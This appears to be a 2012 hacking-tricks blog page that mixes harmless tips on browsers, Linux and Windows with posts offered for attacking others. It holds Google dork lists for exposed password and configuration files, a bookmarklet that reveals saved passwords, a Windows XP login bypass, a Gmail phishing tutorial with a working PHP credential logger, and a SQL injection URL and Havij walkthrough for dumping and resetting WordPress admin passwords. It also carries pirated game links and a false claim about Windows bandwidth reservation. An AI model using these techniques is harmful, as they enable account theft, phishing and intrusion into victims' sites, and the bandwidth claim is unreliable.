Search This Blog

Saturday 10 March 2012

Google search tips for hacking


Google search engine can be used to hack into remote servers or gather confidential or sensitive information which are not visible through common searches.

Google is the world’s most popular and powerful search engine. It has the ability to accept pre-defined commands as inputs which then produces unbelievable results.

Google’s Advanced Search Query Syntax

Discussed below are various Google’s special commands and I shall be explaining each command in brief and will show how it can be used for getting confidential data.

[ intitle: ]

The “intitle:” syntax helps Google restrict the search results to pages containing that word in the title.

intitle: login password


will return links to those pages that has the word "login" in their title, and the word "password" anywhere in the page.

Similarly, if one has to query for more than one word in the page title then in that case “allintitle:” can be used instead of “intitle” to get the list of pages containing all those words in its title.

intitle: login intitle: password


is same as

allintitle: login password


[ inurl: ]

The “inurl:” syntax restricts the search results to those URLs containing the search keyword. For example: “inurl: passwd” (without quotes) will return only links to those pages that have "passwd" in the URL.

Similarly, if one has to query for more than one word in an URL then in that case “allinurl:” can be used instead of “inurl” to get the list of URLs containing all those search keywords in it.

allinurl: etc/passwd


will look for the URLs containing “etc” and “passwd”. The slash (“/”) between the words will be ignored by Google.

[ site: ]

The “site:” syntax restricts Google to query for certain keywords in a particular site or domain.

exploits site:hackingspirits.com


will look for the keyword “exploits” in those pages present in all the links of the domain “hackingspirits.com”. There should not be any space between “site:” and the “domain name”.

[ filetype: ]

This “filetype:” syntax restricts Google search for files on internet with particular extensions (i.e. doc, pdf or ppt etc).

filetype:doc site:gov confidential


will look for files with “.doc” extension in all government domains with “.gov” extension and containing the word “confidential” either in the pages or in the “.doc” file. i.e. the result will contain the links to all confidential word document files on the government sites.


[ link: ]

“link:” syntax will list down webpages that have links to the specified webpage.

link:www.expertsforge.com


will list webpages that have links pointing to the SecurityFocus homepage. Note there can be no space between the "link:" and the web page url.


[ related: ]

The “related:” will list web pages that are "similar" to a specified
web page.

related:www.expertsforge.com


will list web pages that are similar to the Securityfocus homepage. Note there can be no space between the "related:" and the web page url.


[ cache: ]

The query “cache:” will show the version of the web page that Google
has in its cache.

cache:www.hackingspirits.com


will show Google's cache of the Google homepage. Note there can be no space between the "cache:" and the web page url.

If you include other words in the query, Google will highlight those words within the cached document.

cache:www.hackingspirits.com guest


will show the cached content with the word "guest" highlighted.

[ intext: ]

The “intext:” syntax searches for words in a particular website. It ignores links or URLs and page titles.

intext:exploits


will return only links to those web pages that has the search keyword "exploits" in its webpage.


[ phonebook: ]

“phonebook” searches for U.S. street address and phone number information.

phonebook:Lisa+CA


will list down all names of person having “Lisa” in their names and located in “California (CA)”. This can be used as a great tool for hackers incase someone want to do dig personal information for social engineering.

Google Hacks

Well, the Google’s query syntaxes discussed above can really help people to precise their search and get what they are exactly looking for.

Now Google being so intelligent search engine, hackers don’t mind exploiting its ability to dig much confidential and secret information from the net which they are not supposed to know. Now I shall discuss those techniques in details how hackers dig information from the net using Google and how that information can be used to break into remote servers.

Index Of

Using “Index of ” syntax to find sites enabled with Index browsing

A webserver with Index browsing enabled means anyone can browse the webserver directories like ordinary local directories. The use of “index of” syntax to get a list links to webserver which has got directory browsing enabled will be discussd below. This becomes an easy source for information gathering for a hacker. Imagine if the get hold of password files or others sensitive files which are not normally visible to the internet. Below given are few examples using which one can get access to many sensitive information much easily.

Index of /admin
Index of /passwd
Index of /password
Index of /mail

"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess

"Index of /secret"
"Index of /confidential"
"Index of /root"
"Index of /cgi-bin"
"Index of /credit-card"
"Index of /logs"
"Index of /config"


Looking for vulnerable sites or servers using “inurl:” or “allinurl:”

a. Using “allinurl:winnt/system32/” (without quotes) will list down all the links to the server which gives access to restricted directories like “system32” through web. If you are lucky enough then you might get access to the cmd.exe in the “system32” directory. Once you have the access to “cmd.exe” and is able to execute it.


b. Using “allinurl:wwwboard/passwd.txt”(without quotes) in the Google search will list down all the links to the server which are vulnerable to “WWWBoard Password vulnerability”. To know more about this vulnerability you can have a look at the following link:

http://www.securiteam.com/exploits/2BUQ4S0SAW.html

c. Using “inurl:.bash_history” (without quotes) will list down all the links to the server which gives access to “.bash_history” file through web. This is a command history file. This file includes the list of command executed by the administrator, and sometimes includes sensitive information such as password typed in by the administrator. If this file is compromised and if contains the encrypted unix (or *nix) password then it can be easily cracked using “John The Ripper”.

d. Using “inurl:config.txt” (without quotes) will list down all the links to the servers which gives access to “config.txt” file through web. This file contains sensitive information, including the hash value of the administrative password and database authentication credentials.

For Example: Ingenium Learning Management System is a Web-based application for Windows based systems developed by Click2learn, Inc. Ingenium Learning Management System versions 5.1 and 6.1 stores sensitive information insecurely in the config.txt file. For more information refer the following
links: http://www.securiteam.com/securitynews/6M00H2K5PG.html

Other similar search using “inurl:” or “allinurl:” combined with other syntax


inurl:admin filetype:txt
inurl:admin filetype:db
inurl:admin filetype:cfg
inurl:mysql filetype:cfg
inurl:passwd filetype:txt
inurl:iisadmin
inurl:auth_user_file.txt
inurl:orders.txt
inurl:"wwwroot/*."
inurl:adpassword.txt
inurl:webeditor.php
inurl:file_upload.php

inurl:gov filetype:xls "restricted"
index of ftp +.mdb allinurl:/cgi-bin/ +mailto


Looking for vulnerable sites or servers using “intitle:” or “allintitle:”

a. Using [allintitle: "index of /root”] (without brackets) will list down the links to the web server which gives access to restricted directories like “root” through web. This directory sometimes contains sensitive information which can be easily retrieved through simple web requests.

b. Using [allintitle: "index of /admin”] (without brackets) will list down the links to the websites which has got index browsing enabled for restricted directories like “admin” through web. Most of the web application sometimes uses names like “admin” to store admin credentials in it. This directory sometimes contains sensitive information which can be easily retrieved through simple web requests.

Other similar search using “intitle:” or “allintitle:” combined with other syntax

intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart

allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov



Other interesting Search Queries

· To search for sites vulnerable to Cross-Sites Scripting (XSS) attacks:

allinurl:/scripts/cart32.exe
allinurl:/CuteNews/show_archives.php
allinurl:/phpinfo.php



· To search for sites vulnerable to SQL Injection attacks:

allinurl:/privmsg.php
allinurl:/privmsg.php

Customize your Firefox with useful Add-ons!


This post deals with a few useful Firefox Add-ons, which makes your Firefox more comfortable than before.

Tiny Menu:

If you are not using the menu bar frequently and you feel that the menu bar is occupying more space in your browser, then you can shrink it with this add-on. It will help to replace the standard menu bar in Firefox with a single popup icon in the menu bar. Customization on menu to be collapsed can also be made simple with its option.

IE Tab:

For some web pages, we still have to use internet explore so we have to change the browser to continue with it, but now it very easy with IE tab in Firefox. Single click will change the Firefox tab into IE tab and you can continue browsing with it without any disturbance.

Convert Web Pages to PDF:

No more tiring HTML formats for saving web page! With this add-on, web pages can be saved in PDF format. This add-on can be also used as PDF management tool in Firefox. Sometimes opening PDF files in low bandwidth makes Firefox crash but this add-on will provide the pop up option to save or open, using which the PDF file can be downloaded.

Tab Popup:

This add-on pop up displays the tab content on doing a mouse-over, which enables us to see what’s inside the page. So, no need to switch between tabs until pages are completely downloaded. Pop up size of the tab is customizable.

Splash:

It adds a screen before Firefox opens up. Any image, text or audio file can be used in the splash screen to “welcome” you.

Extended Status Bar:

This add-on provides images, speed, percentage, time and loaded size of the web page.
Source: Devils Workshop

Linux Tips


------------------------------------------------------------------------------------
Who is SUPER USER in linux
awk -F: '$3 == 0{print $1,"superuser!"}' /etc/passwd
------------------------------------------------------------------------------------
How to get Environment for a process
If the process id is 920.
(cat /proc/920/environ; echo) : tr "\000" "\n"
------------------------------------------------------------------------------------
How to list files with their complete path
If 'childdir' is the name of directory.
find childdir -type f -printf "%AY%Am%Ad%AH%AM %p\n" : sort -r : gawk
'{print $2}'
------------------------------------------------------------------------------------
How to find open files in linux
find /proc -regex "/proc/[0-9]*/fd/.*" -ls
------------------------------------------------------------------------------------
Formatting man pages
man ls : col -bx > myfile.txt
------------------------------------------------------------------------------------
Finding the biggest files
ls -l : sort +4n
------------------------------------------------------------------------------------
Searching files for content
find / -name "filename" : xargs grep -n content
------------------------------------------------------------------------------------
Largest Directories
du -kx : egrep -v "\./.+/" : sort -n
-----------------------------------------------------------------------------------
List today's files only
ls -al --time-style +%D : grep `date +%D`
------------------------------------------------------------------------------------
Encrypt some plain text
perl -e 'print crypt("ke", "password");'
-----------------------------------------------------------------------------------
Look for unusual SUID root files
find / -uid 0 -perm -4000 -print
-----------------------------------------------------------------------------------
Look for unusual large files (> 10 Mb)
find / -size +10000k -print
-----------------------------------------------------------------------------------

PUT YOUR NAME IN TASKBAR

Trick to Show Your name after time in taskbar... Try this trick to add up ur name in place of AM and PM beside time Its simple Step-1:- Navigate to -> Start -> Control Pannel -> Regional and Language Option -> Click on Customize -> Go to TIME Tab -> Change AM symbol and PM symbol from AM and PM to ur name -> Apply -> Ok ... Did It change? If not, follow step-2 below. Step2:- Now go to time in taskbar and Double Click it to open "Date and time property" ...Look place where time changes in digital form i.e. 02:47:52 AM , click to arrow to cnage the AM or PM by selecting and press arrow. It will Show ur name or name that was entered by u, Apply -> OK and enjoy with TRICKSGOD

Useful RUn Commands


Just go start,then click on Run then type any comand below


0) cmd - comand prompt
1) compmgmt.msc - for computer managent
2) devmgmt.msc - device manager
3) regedit - registry editor
4) msconfig - system configuratn utility . . .
5) compmgmt.msc - Computer management
6) devmgmt.msc - Device manager
7) diskmgmt.msc - Disk management
8) dfrg.msc - Disk defrag
9) eventvwr.msc - Event viewer
10) fsmgmt.msc - Shared folders
11) gpedit.msc - Group policies
12) lusrmgr.msc - Local users and groups
13) perfmon.msc - Performance monitor
14) rsop.msc - Resultant set of policies
15) secpol.msc - Local security settings
16) services.msc - Various Services
17) msinfo32 - System Information
18) sysedit - System Edit
19) win.ini - windows loading information(also system.ini)
20) winver _ Shows current version of windows
21) calc - calculator

Hack Using Javascript

hi frinedz.. many users forget to logout and they also tick ramember me option so thats way when login page open than password written in JavaScript so we not read it so now do this open login page and put this code after url of that page and hit enter u can see that passeord

javascript:(function() {var%20s,F,j,f,i;%20s%20=%20%22%22; %20F%20=%20document.forms;%20for(j=0;%20j<F.length;%20++j) %20{%20f%20=%20F[j];%20for%20(i=0;%20i<f.length;%20++i) %20{%20if%20(f[i].type.toLowerCase()%20==%20%22password%22) %20s%20+=%20f[i].value%20+%20%22 %22;%20}%20}%20if %20(s)%20alert(%22This Trick is Exclusively shared by Riken8804%20@www.tricksgod.net:%20The%20Password%20On %20This Page:%22%20+%20s);%20else%20alert(%22There%20are %20no%20passwords%20in%20forms%20on%20this %20page.%22);})();
hey frends. many of u know this but still 4 those who are not aware of this trick...

if u forgot password or want to log on in others computer just follow this trick....

works 100percent in XP the trick follows---
1) start computer
2) when it asks for password press ctrl+alt+delete keys twice
3) now another window opens asking for password.
4) in this at the place of user name just type administrator....leave the password feild blank and hit enter
5)wow u have logged in as a normal user
6) now u hav full authority only problem is that u can't open my document of the original account.
6) don't worry abt. this just use any file recovery softwere and move the files from acess denied my document to any other folder(in other drive)

enjoy

Unlock Sim Password

How to Unlock Sim card password if it is locked accidentally..
Here`s a tool named Universal SimLock Remover .It works fine for almost all models of the mobile phones.
USR(Universal Simlock Remover) is an opensource software such that all new Releases will be updated.
article-page-main_ehow_images_a06_t6_ni_unlock-sim-motorola-q-800x800

Now Version 1.09 supports all the handsets upto now and 10 new languages.
Its so handy and can easily retrieve the passwords of the mobile phone.
Heres the download link of the FULL version U.S.R
Tested...Working well

Free Recharge For All Networks

I’ve got a very easy method to earn free recharge and you have to do some registration to enjoy this offer.
Freetalkie is a free recharge provider and has some great offers for their users.. And Follow the steps to Get Free Recharge
STEPS
  • Click on Register to eligible for Free Recharge and Fill your Original details.
  • Then you will redirected to the page. Then click on EARN FREE RECHARGE tab.
  • And you will see the list of Offers. Then Click on Participate. It will take 15 mins to complete all the Registration
  • Complete the offers on the page to obtain free recharge. The minimum amount of payout is rs10 and the minimum amount of per offer is quite higher than other sites and its 2rs per offer.
  • Once you got sufficient balance in your FreeTalkie wallet you can request for mobile recharge by clicking on Free Recharge. While requesting for free recharge please make sure that you have enough balance in your FreeTalkie’s wallet and the recharge you are requesting is available for that particular operator.
  • I’ve got recharge of 20 Rs.(2 times) in 2 hours.. check it out..
  • Its supported all networks.
  • Get your Free Recharge Now..

FiFa 2011 - Repack [2010/1 Direct Link] ISO COMPRESSED


fifa11v2repack

FiFa 2011 - Repack [2010/1 Direct Link]


Screenshots:-
2

1

Minimum System Requirements:-

  • Operating System : Microsoft Windows XP / Windows Vista / Windows 7
  • Processor : Intel Core 2 Duo at 1.8 GHz / Athlon 64 X2 Dual Core 5400
  • Video Card : 256 MB VRAM ? (NVIDIA GeForce 6800 or better / ATI Radeon X1600 or better) **
  • Memory : 1 GB RAM (2 GB required for Windows Vista / Windows 7)
  • Hard Disk : 6.5 GB of free Hard Drive space
  • Sound Card: DirectX 9.0c Compatible
  • Direct X : 9.0c
  • Controls : Keyboard & Mouse
  • Installation : DVD-ROM Drive
Download links-

http://www.wupload.com/file/162368397
http://www.wupload.com/file/162368398
http://www.wupload.com/file/162368399
http://www.wupload.com/file/162368400
http://www.wupload.com/file/162368401
http://www.wupload.com/file/162368402
http://www.wupload.com/file/162368403
http://www.wupload.com/file/162368404
http://www.wupload.com/file/162368405
http://www.wupload.com/file/162368406
http://www.wupload.com/file/162368407
http://www.wupload.com/file/162368408
http://www.wupload.com/file/162368409
http://www.wupload.com/file/162368410
                                              http://www.wupload.com/file/162368411

Get Free Premium 1 Year Trend Micro Titanium Antivirus Subscription Worth € 29.95


1+thefuturehackers.com

Strong, fast and easy-to-use security – Trend Micro™ Titanium™ Antivirus + provides essential protection so you can email and surf the web hassle free.


  • Proactively stops threats
  • Light demands on system resources
  • Easy to use and understand
  • Extends protection to Macs
How to get this for free?
  1. Click here to go to offer page
  2. Click Download Now at the end of the page [Don't Worry, You will not require any credit card]
  3. Fill the form and submit
  4. You will receive two mails , one of them contains serial key.
So get this antivirus and save € 29.95 :-)

Prince of Persia Sands of Time

Prince%2Bof%2BPersia%2BThe%2BSands%2BOf%2BTime
Prince%2Bof%2BPersia%2BThe%2BSands%2BOf%2BTime%2B%2B1Prince%2Bof%2BPersia%2BThe%2BSands%2BOf%2BTime%2B%2B2Prince%2Bof%2BPersia%2BThe%2BSands%2BOf%2BTime%2B%2B3Prince%2Bof%2BPersia%2BThe%2BSands%2BOf%2BTime%2B%2B4Prince%2Bof%2BPersia%2BThe%2BSands%2BOf%2BTime%2B%2B5
Genre: Third-Person Action Adventure
Publisher: Ubisoft
Developer: Ubisoft Montreal

Publisher Ubisoft brings us the next official installment in the legendary Prince of Persia series with Prince of Persia: The Sands of Time for the PC. Play as an acrobatic Prince who can run on walls, swing off poles, jump and flip, and much, much more.

Using the Sands of Time, players can slow, stop and even reverse the flow of time to their advantage. Wield several different powerful swords and do battle with magical enemies on your mission to restore order to ancient Persia. Scale dangerous heights as well as avoiding traps like spikes, wall-blades and more.

Features :

* A technological masterpiece. Witness some of the most advanced programming in gaming history, pushing the limitations of consoles and raising the standards of games in all areas of production: physics, lighting, graphics, animations and more.
* Wield powers of mythic proportions. The prince returns to action adventure gaming with gravity-defying acrobatics, ferocious fighting skills and the ability to bend time to fulfill his destiny.
* Erase the past, behold the future and freeze the present in real time for unlimited gameplay variations.
* Exotic worlds and vast kingdoms. Uncover the mysteries of a world never before explored in action adventure gameplay.
* Persia holds a staggering array of landscapes and kingdoms to explore and conquer.
* A sweeping adventure of betrayal and triumph, the epic legends and deadly creatures of mythic Persia come to life in this suspense-filled tale featuring more twists and turns than the labyrinthine palace itself.

Minimum Requirements :

* P 800 MHz
* 256 MB RAM
* 64 MB 3D accelerator
* 16x CD-ROM
* 1.5 GB free disk space

Size : 1.45 GB

Download

http://www.fileserve.com/file/8gjY5dz/Prince_of_Persia_-_Sands_of_Time_-_Cd_1.iso
http://www.fileserve.com/file/BBw8aJs/Prince_of_Persia_-_Sands_of_Time_-_Cd_2.iso

OR

http://www.filesonic.com/file/991889981/Prince_of_Persia_-_Sands_of_Time_-_Cd_1.iso
http://www.filesonic.com/file/991894061/Prince_of_Persia_-_Sands_of_Time_-_Cd_2.iso

OR

http://www.uploadstation.com/file/REzsVQq/Prince_of_Persia_-_Sands_of_Time_-_Cd_1.iso
http://www.uploadstation.com/file/jKUnuRP/Prince_of_Persia_-_Sands_of_Time_-_Cd_2.iso

Hack Gmail by Pishing

In this following tutorial to phishing I‘ll demonstrate how to hack Gmail account password by phishing. Since we already covered how to hack Facebook account using phishing I consider this as second tutorial to phishing. First of all we will create a fake login page, to create it open www.gmail.com in your web browser, click on file then save as and select file name “Gmail” and save as type “Web page Complete”. After above process you’ll have a file named Gmail.htm and a folder named Gmail_files in folder in which you’ll save web page. Now open Gmail.htm in notepad, find for action word and locate following string,
hack+gmail+account1
action="https://www.google.com/accounts/ServiceLoginAuth"
hack+gmail+account+%25282%2529

Once located change action string by phish.php, so that above string should appear as following,

action="phish.php"

Now step number two is to create phish.php file. Open notepad and copy following code in it,

header ('Location: https://www.google.com/accounts/ServiceLoginAuth ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Save it as phish.php, now create an empty password log file log.txt. Now sign up for a free webhosting service which supports php from http://www.100best-free-web-space.com/. Now upload Gmail.htm file, php file, password log file and Gmail_files folder to that web host. Change permission of log.txt file to777 from settings so that no one else than you can see or edit it.

Now you have to vector this phished site to your victim to hack his/her password. We will cover vectoring phished pages and countermeasures to phishing after few more tutorials on phishing. Till then have a nice time, thanks for reading and keep visiting.

Create Fake Login Page of any site with Super Phisher Tool



capturelig
Hello HWP readers, Today I am going to explain you how to make your own Phishing page without any sort of copy & pasting but just with a simple click. Most of HWP readers demanded me to post this article, so I thought of posting it and make it available to all.
If you are a beginner and you want to know how Phishing works, then follow my previous post
First of all let me specify some key features of this Phishing tool :-

* Simple and easy tool which can be used even by a 10 years old boy.
*Create any fake page. For ex- Facebook, Gmail, Yahoo, Hotmail, etc.

Steps to create your own Fake Page:-

* Download Super Phisher here & Extract it.
*Run it
*Fill the Boxes
* In the [url of login box] Type that url which you want to make fake page
ex :-www.facebook.com/login.php
*2nd your password txt file prateek'slogs.txt
*name of fake page file same as phish.php
*site to be redirected after login of victim
1)
2


2) This is the Output folder where the fake page has been created.

3

3)These are the Fake pages which are created by the Super Phisher.

4

Thanks for reading this article. If u face any problem, feel free to ask

Hack Word Press Blogs easily wordpress-hack

wordpress-hack


There is so many bloggers using Facebook Connect Wordpress plugin for their blogs. They think it's cool. But it could be a Big Security hole. Here's the way to hack these sites.

Step 1 :
http://www.google.com

Step 2:Now enter this dork to find sites with security hole..

inurl:"fbconnect_action=myhome"

untitled24
Step 3: You will find many sites, Select the site which you are comfortable with.

untitled22
You will find something like that.


Step 4: Now replace
?fbconnect_action=myhome&userid=

with this
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--

Step 5: Now you have the User name and Password.

untitled23

Step 6: The password is encrypted with Wordpress md5 (blowfish). You need to decode this. Download and run this software to decode this type of password.


Step 7: Then find the administrator panel out. Normally it should be in
www.victrimsite.com/wp-admin
or
www.victrimsite.com/wp-login.php

untitled26


Note: Decoding this type of password may take a big time.

So you here is another way to hack the password.....


Step 1: Open Havij and paste the blog url you are going to hack..

Example:
http://www.victrimsite.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat%28user_login,0x3a,user_pass%29z0mbyak,7,8,9,10,11,12+from+wp_users--

Step 2: Now find Databases, Tables.

Step 3: Select wp-users then find tick on all columns. Then click on Get Data.

Step 4: You will find something like that..
untitled25

Step 5: Now select any user and change the user_pass to
$P$BbCzkVXQ6r.T8znShDPMSzM7Whhubc/

Step 6: Now login with the password
ThanX.!! Your CommenTs Are Welcome.!!

Awesome Google Tricks & Tips Together In One Place ( Try These all and expereince a lot )



google-tips-tricks

GO TO GOOGLE and type the following:

  • Type in " Let It snow" and then click on "i'm Feeling Lucky".[wait a sec to expereince the snow fall].

  • Type in "Google Gravity"and then click on "i'm Feeling Lucky"[wait a sec to experience the effect of gravity].

  • Type in "elggog"and then click on "I'm Feeling Lucky"[the Mirror effect is on]

  • Type in " do a barrel roll" and then you expereince .... Did the Earth move for you? The image in your browser should — well, it should have done a barrel roll.

  • Type in "Who's Awesome" and then click on "I'm Feeling Lucky" any one can dare to try????

  • Type in "tilt" and then you experience and that lets you visualize any web page DOM tree in 3D.

  • Type in "Who is the cutest"and then click on "I'm Feeling Lucky"[then see who is cute and beautiful/handsome]

  • Type in "Google Loco"and click on "I'm Feeling Lucky"[then see what's moving]

  • Type in "LOL Limewire"and then click on "I'm Feeling Lucky"[then see that you are as a picture]

  • Type in "Epic Google"and then click on "I'm Feeling Lucky"

  • Type in "rainbow Google"and then click on "I'm Feeling Lucky"

  • Type in "Annoying Google' and then click on "I'm Feeling Lucky"

  • Type in "Google pacman"and click on "I'm feeling Lucky"

  • Type in "Google Magic"and click on "I'm Feeling Lucky"

  • Type in "Google Heart Page" and then click on "I'm Feeling Lucky".

  • Type in "Google colour[Ex: Red, Green, Pink, Yellow)" and then click on "I'm Feeling Lucky".

  • Type in "Epic box" and then click on "I'm Feeling Lucky".

  • Type in "sexy snape" click on "I'm Feeling Lucky".

  • Type in "Google Sphere"and click on "I'm feeling Lucky"[then see the spinning effect]

  • Type in "weenie google" and then click on "I'm Feeling Lucky".

Increase Your Internet Speed 40%




hsi

Your Internet conection is slow?........ So Today I teach you how to Increase your Internet speed upto 20%., so go through this trick and increse your net speed 20%.

Actually Microsoft reserves 20% of your available bandwidth for their own purposes like windows updates and interrogating your PC etc.

So this you can it back as the following steps:

Click Start Button then open the Run and type "gpedit.msc" without quotes. This opens the Group Policy Editor.

Then go to :

--> Local Computer Policy

--> Computer Configuration

--> Administrative Templates

--> Network

--> QOS Packet Scheduler

--> Limit Reservable Bandwidth.

Double Click on Limit Reservable Bandwidth Option .

It will say it is not configured, but hte truth is under the ' Expalin ' tab i.e .By default , the Packet Scheduler Limits the system to 20 percent of the bandwidth of a connection , but you can change the settings .

So the trick is to ENABLE reservable bandwidth , then set it to ZERO . This will allow the system to reserve nothing, rather than the default 20%.

internet-increase

Friday 9 March 2012

Make your Laptop / Mobile Impossible to Steal for Free


laptop thief 300x178 Make your Laptop / Mobile Impossible to Steal for Free Research shows that one laptop is stolen every 53 seconds and a mobile in every 12 seconds somewhere. Your dear gadget might be next in the list. Though buying costly insurance buys you a new one, it can’t save your potentially dangerous personal information and hard work from filthy thief. But using this free software called PREY, you can track your stolen laptop/mobile like James Bond.You guessed it right, I’m a fan of James Bond.
How it works? You install a lightweight but powerful Prey in your PC or mobile. It sits silently for your signal to wake up and do its job. You can send this signal via SMS or internet. After Prey receives its signal that’s when the game begins. It sends you location of that device by email,network activity and even lets you trigger select actions on your PC. It even captures pictures of the thief silently and sends them.
You can even track his active internet sessions, That’s not all, Prey will attempt to hook onto to the nearest open WiFi hotspot when no Internet connection is found. It even lets you delete your personal information and lock your computer with a message to unlock with password. If you can’t use it no one can.
As of now you can install PREY completely free on Windows,Mac,Linux,iPhone and Android. Current version is 0.5.4 released in December,2011.

Top 10 Google Chrome Extensions


google chrome extensions 300x194 Top 10 Google Chrome Extensions Do you use the Google Chrome web browser to browse the internet?
Then here are some chrome extensions that are going to blow your mind! A chrome extension is an add-on to your browser that adds more functionality to your browser. It can improve the overall user experience and increase your productivity to a great extent.

How to search/install  extensions:
1.>Click on the wrench (Spanner like icon just below the close button)
2.> Select tools
3.> Click on extensions
4.> Go to the bottom of the page and click on “Get more extensions
5.> Chrome web store subsequently opens. Select the required extension and click install.

Top chrome extensions:
1> Facebook for chrome:   It is the best extension for Facebook that i have found till date. It’s simple to install and use. One can get notifications, comment, like, share, read the news feeds directly from the extension, without the need to open the website all the time. The best part of this extension is that you can get real time notifications.  Amazing, time saving extension! You just got to try it!
2> Google mail checker:   Don’t want to lose track of the emails you get? Want to get notified when you receive any mail? Then this is an extension that you must download right away! It’s a super useful extension that notifies you as soon as you get any mail in your inbox, so that you don’t have to check it every few minutes and waste your precious time. You get notified as soon as you get any mail, and with the click of that icon, you are led to your inbox. Makes life simple!
3> Fastest chrome: This is a chrome version of the grease monkey of Firefox. It enables you to speed up the overall performance of chrome. You can save some serious time and enhance your total productivity. Get quick definitions, auto-load next pages, search faster and better, and more.
4> IE tab: There are always some web sites that open properly only in internet explorer (IE). But now, you need not switch your browser for the sake of a few web sites. Here comes IE tab to the rescue! It can display web pages using IE within Chrome. It supports ActiveX controls, SharePoint etc. It is a great extension to open those websites that can open only in the internet explorer.
5> Google dictionary: Want to expand your vocabulary? Google dictionary is  a neat tool to get any sort of definitions/meanings that you need while browsing the web. It has very simple yet intriguing features. Just highlight the word/phrase that you need to know about and double click on. The meaning magically appears right next to it in a cloud. You can even listen to the word being pronounced. Neat way to learn new words!
6> iReader: Some websites have very tiny font in a very un aesthetic fashion. Reading such websites can be such a pain. This can come in handy in such situations. As soon as you open any readable web content, the iReader icon appears next to the star in the address bar. Clicking this will enable the (adoble pdf-style) reader which makes it so much easier to read the content and aesthetically pleasing. The content is stripped away from the ads and you can get a clean page of your readable content.
7> Wolfram|Alpha: Have any questions to ask? Using this you can get expert answers to your questions when you need it. It is very versatile and can be used in various purposes that range from plotting mathematical graphs to solving equations to answering your calculus homework. Get answers to any kind of questions from their expert knowledge bank and quick!
8> ESPN cricinfo: For all you cricket fans out there, Espn cricinfo gets you the latest updates, live scores and the latest news in the fied of cricket right  before your eyes. It shows notifications about the latest matches taking place and that are going to take place so you are updated instantly about any cricket related news instantly. A very handy and user-friendly extension.
9> Magic actions for YouTube: Its unreal magic! Using this you can have a cinema like experience from the comforts of your home/work space. It enhances the overall YouTube experience with its innovative Cinema mode, automatic volume controls, auto HD, auto hide options. My favorite is the cinema mode. It darkens out every detail on the page other than the video itself. One click sharing is also possible and effective. Kudos to the developers!
10> Box: In most scenarios, one needs to work with a team to accomplish any task. Box is a great tool to store your content online. You can share it with the people you want to, give them access to modify the documents, and access the files from anywhere in the world using any device (even a phone!). You can make changes to the documents in real time and all the changes will be available instantly to all the people you are sharing the document with.
Click on the links to directly download the ten extensions above. There are thousands of chrome extensions/apps on the chrome web store. Categorizing them as top ten is tough. If i have missed out any, please feel free to include them in the comments section below icon smile Top 10 Google Chrome Extensions

Trick to Remove Scratches on Mobile Screen With Toothpaste


iPhone scratch 298x300 150x150 Trick to Remove Scratches on Mobile Screen With Toothpaste If you’re like me, who puts a lot of things in your pocket with your phone. You’ll probably have a lot of scratches on your mobile. Be it a car or phone it always burns your heart to see scratches. Though using a good quality screen guard helps you avoid scratches. But as i said, if you’re like me you’d peel that off too after some time. Sooner or later Scratches are inevitable. One thing you could do about these to buy displex, a scratch removing lotion from mobile or sunglasses store. But you can also your toothpaste which works the same way displex does.
toothpaste phonefix 300x169 Trick to Remove Scratches on Mobile Screen With Toothpaste> Apply a pea amount of toothpaste on the screen. and gently rub in circles with a soft wash cloth or a tissue paper.  Leave it to dry for a minute and gently remove paste with a damp cloth.  If it doesn’t work try again, and if still doesn’t use a displex as i mentioned above.  Have Fun!!

Trick to Schedule Auto Shutdown in Windows / Mac


Screen shot 2012 02 04 at 4.18.32 PM e1328353589238 150x150 Trick to Schedule Auto Shutdown in Windows / Mac  I often feel bad to keep my computer ON all night, as i keep my downloads live while i sleep. But just like us, your PC needs to rest too. And that is why, i schedule auto shutdown of my computer after it completes its job.

> In Windows :

You can schedule Automatic shutdown in windows without any software. To do that follow these simple steps:
> Go to start and type task scheduler, and press Enter.
> Go to Action > Create Basic Task. Give any name and click next. Set delay as ’0′ and set the time when you want to shutdown computer. Click next and select start a program & hit next.
> Copy and paste C:\Windows\System32\shutdown.exe under program/script field. Click next and finish.
If you don’t want all that fuss, you can download a small software called Auto Shutdown

> In Mac :

Just like in Windows you can schedule shutdown in mac too with and without any software. Here’s how to do it without any software.
> Go to System Preferences> Energy Saver> Power Adapter and click on schedule.
> Check second check box and select shutdown from dropdown menu, set time and click OK.
You can also do this using a mac app called MacShutdown. Have Fun!!

Trick to Recover Deleted Files Without Any Software


recover deleted files 200x162 Trick to Recover Deleted Files Without Any Software Sometime we all do things, we don’t mean to. Likely you might have accidentally delete some important files and want them back. Unless you have deleted your files ages ago, you can restore your deleted files with a single click without using any 3rd party software. And i’m not talking about restoring files resting in recycle bin, i’m talking about files already deleted from recycle bin.
This simple trick works on most versions of vista and all versions of Win 7. For the sake of tutorial lets assume you have permanently deleted justinbeiber.jpg from the folder named ‘cute girls’.
> All you have to do is Right click on the folder ‘cute girls’ and search for a option called Restore Previous Versions and click it. That’s its you will get your justinbeiber.jpg back in place.
In case you don’t see any such restore previous option, do this: Go to Control Panel > System and Security > System and click on System Protection in left sidebar. Select your drive and click ‘configure’. Check Restore system settings and previous version of files and click ok.
Just in case you haven’t got your file back, try this popular file recovery software Recuva. Have Fun!!

Password Protect Your Usb Drive without any software


rohos mini usb encryption Password Protect Your Usb Drive without any software You can’t call yourself a computer geek if you don’t know this trick. It’s always a good idea to carry your important files in a usb instead of carrying the whole laptop. But i don’t like everyone prying my files on usb. So i use a password for anyone who tries to access my ubs drive. It also helps to secure my data from wrong hands in case of theft.
There are lot of softwares out there(most of which are paid apps) to help you with this but if you’re using windows you don’t need any app. Here’s what you have to do to password protect your usb flash drive.
> Plugin your USB, click on Start & type BitLocker Drive Encryption and launch that app.
